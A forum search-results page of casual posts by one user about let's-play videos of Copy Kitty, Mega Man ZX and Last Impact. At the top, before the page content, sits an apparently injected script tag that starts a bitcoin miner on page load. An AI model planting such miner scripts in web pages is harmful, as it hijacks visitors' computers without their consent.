<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralmario fan games galaxy

Search found 513 matches

Go to advanced search

by Plutia
1 week ago
Forum: let's play
Topic: Copy Kitty - Imitation is the besterest form of flattery
Replies: 1189
Views: 108906

Re: Copy Kitty - Imitation is the besterest form of flattery

So for anyone else trying to gold-star this level, here's the trick to handling the first wave of enemies: Just run far back and shoot. The enemy shots despawn if you get far enough away, and Fortress Virs' attacks don't get in the way either. From the winning run, it looks like raocow had caught o...
by Plutia
2 weeks ago
Forum: let's play
Topic: Copy Kitty - Imitation is the besterest form of flattery
Replies: 1189
Views: 108906

Re: Copy Kitty - Imitation is the besterest form of flattery

raocow was saying Remote is Bad in... a situation where remote is incredible, though, because you can just aim it behind the shield guys and that would have taken care of them easily, and it's still easily stronger than just the normal boki beam
by Plutia
3 weeks ago
Forum: let's play
Topic: Copy Kitty - Imitation is the besterest form of flattery
Replies: 1189
Views: 108906

Re: Copy Kitty - Imitation is the besterest form of flattery

boki normal -> boki hard -> savant normal -> savant hard is how I'd like to see it done because raocow's gonna need to seriously adjust for savant content
by Plutia
4 weeks ago
Forum: let's play
Topic: Copy Kitty - Imitation is the besterest form of flattery
Replies: 1189
Views: 108906

Re: Copy Kitty - Imitation is the besterest form of flattery

Raocow: Calls Blitz Bomb unusable... then proceeds to kill a Virs before it even attacks with Blitz Bomb. I think raocow will be fine beating the actual levels, but he's at the point in the game where you have to actually try in order to get a gold star. Now Hard Mode, on the other hand... if he co...
by Plutia
1 month ago
Forum: let's play
Topic: Mega Man 10 - The Long Goodbye
Replies: 6095
Views: 281185

Re: Mega Man ZX Advent - The Last Mega Man

xnamkcor wrote: Model Ecchi
nominating this for worst post in this entire thread
by Plutia
1 month ago
Forum: let's play
Topic: Mega Man 10 - The Long Goodbye
Replies: 6095
Views: 281185

Re: Mega Man ZX Advent - The Last Mega Man

raocow would still ignore it
by Plutia
1 month ago
Forum: let's play
Topic: Copy Kitty - Imitation is the besterest form of flattery
Replies: 1189
Views: 108906

Re: Copy Kitty - Imitation is the besterest form of flattery

So a thing you may have forgotten from your older runs: When you have Remote as one of Boki's weapons, you can set off the explosive by using a kick (or rather, the kick button is also the "detonate Remote" button). This is pretty useful to keep in mind on levels where Remote is one of your main we...
by Plutia
1 month ago
Forum: let's play
Topic: Mega Man 10 - The Long Goodbye
Replies: 6095
Views: 281185

Re: Mega Man ZX Advent - The Last Mega Man

you act as if raocow will use those anyways
by Plutia
1 month ago
Forum: let's play
Topic: Copy Kitty - Imitation is the besterest form of flattery
Replies: 1189
Views: 108906

Re: Copy Kitty - Imitation is the besterest form of flattery

okay, NOW the game should start looking pretty significantly different
by Plutia
1 month ago
Forum: let's play
Topic: Mega Man 10 - The Long Goodbye
Replies: 6095
Views: 281185

Re: Mega Man ZX Advent - The Last Mega Man

i think the reason a lot of us are petitioning for ashe is because raocow enjoys her a lot more than grey from what has been presented thus far

it's ultimately raocow's decision but i want to see him play as the character he personally enjoys
by Plutia
1 month ago
Forum: let's play
Topic: Mega Man 10 - The Long Goodbye
Replies: 6095
Views: 281185

Re: Mega Man ZX Advent - The Last Mega Man

Leet wrote:
ano0maly wrote: we already got that last time
We had a boy the last 41 times before that.
by Plutia
1 month ago
Forum: let's play
Topic: Mega Man 10 - The Long Goodbye
Replies: 6095
Views: 281185

Re: Mega Man ZX Advent - The Last Mega Man

for what it's worth there's not very MUCH of a continuation of the first game's protag's stories, as I recall

you seem to really like ashe so I'm just gonna throw that out there and let you decide what to do with it
by Plutia
1 month ago
Forum: let's play
Topic: COMING UP NEXT
Replies: 818
Views: 58757

Re: COMING UP NEXT

he's not doing the whole thing right now, he's doing hard mode at the original intended time (which I disagree with, I think he should do both boki normal and hard now and savant normal and hard at that time)
by Plutia
1 month ago
Forum: let's play
Topic: COMING UP NEXT
Replies: 818
Views: 58757

Re: COMING UP NEXT

the game's significantly better than before, for the record. it's probably gonna be long.
by Plutia
1 month ago
Forum: let's play
Topic: Mega Man 10 - The Long Goodbye
Replies: 6095
Views: 281185

Re: Mega Man ZX - There Can Be Only One

personal request: punch at least one thing with Model F
by Plutia
1 month ago
Forum: let's play
Topic: Rayman Origins (please see manual for origin story)
Replies: 353
Views: 10950

Re: Rayman Origins (please see manual for origin story)

yeah, if they could you would have spoiled us about it already
by Plutia
2 months ago
Forum: let's play
Topic: Last Impact : Final Impact
Replies: 557
Views: 19901

Re: Last Impact : Forty-Seventh Oh No It's Spring Mario EVERYBODY PANIC FOREVER

Awoo wrote: Spring Mario? I really wonder why FLUDD has only been used like, what, once? It'd be so fitting for this level, but instead I guess it's time for Last Impact: Wario Land Edition (Without Owl Control)
please do not squirt water into your computer
by Plutia
2 months ago
Forum: let's play
Topic: Mega Man 10 - The Long Goodbye
Replies: 6095
Views: 281185

Re: Mega Man Powered Up - A Challenging Side Story

i know for an absolute fact nintendo knows about ZC because site mods said in a discussion that at least one disgruntled banned member tried to report them to nintendo to try and eliminate ZC but it didn't work what I'm putting down is that while ZC got a little bit of buzz, it never got enormous bu...
by Plutia
2 months ago
Forum: Talkhaus Mosts 2018
Topic: Talkhaus 2018 Mosts Results & Userbars
Replies: 47
Views: 2047

Re: Talkhaus 2018 Mosts Results & Userbars

Sebby19 wrote: My name is Sebby19, not Sebby. I know, nitpicky, but they won't mesh with my 2015 Most.
man, most narcissistic is right on the nose huh
by Plutia
2 months ago
Forum: let's play
Topic: Mega Man 10 - The Long Goodbye
Replies: 6095
Views: 281185

Re: Mega Man Powered Up - A Challenging Side Story

for what it's worth, I think it's a good thing zelda classic is semi-obscure, as if it got immensely popular, it'd probably get shut down
by Plutia
2 months ago
Forum: let's play
Topic: Last Impact : Final Impact
Replies: 557
Views: 19901

Re: Last Impact : Thirty-Ninth shot by a rainbow

Leet wrote: "Kaze doesn't have eyes" becomes even more plausible if you've seen his "bowsette mod" that looks like a horrible blow up doll
someone apparently paid money to make him do that too which is the sad part
by Plutia
2 months ago
Forum: let's play
Topic: Last Impact : Final Impact
Replies: 557
Views: 19901

Re: Last Impact : Thirty-Eighth Fall Into Obscurity

the thing that gets me is that kaze apparently spent 4000 hours on all this, and honestly, with what I know of the 64 hacking process, I'd believe it, but there are some things he really should have caught in those 4000 hours
by Plutia
2 months ago
Forum: let's play
Topic: Last Impact : Final Impact
Replies: 557
Views: 19901

Re: Last Impact : Thirty-Eighth Fall Into Obscurity

the trailer video for last impact says it's hard so he acknowledges this is hard stuff at least and also advocates not going for 100%

it doesn't mean the level design couldn't be way better though
by Plutia
2 months ago
Forum: let's play
Topic: Mega Man 10 - The Long Goodbye
Replies: 6095
Views: 281185

Re: Mega Man Powered Up - Back to the Beginning

the level design is probably boring because it was designed with every character in mind

Go to advanced search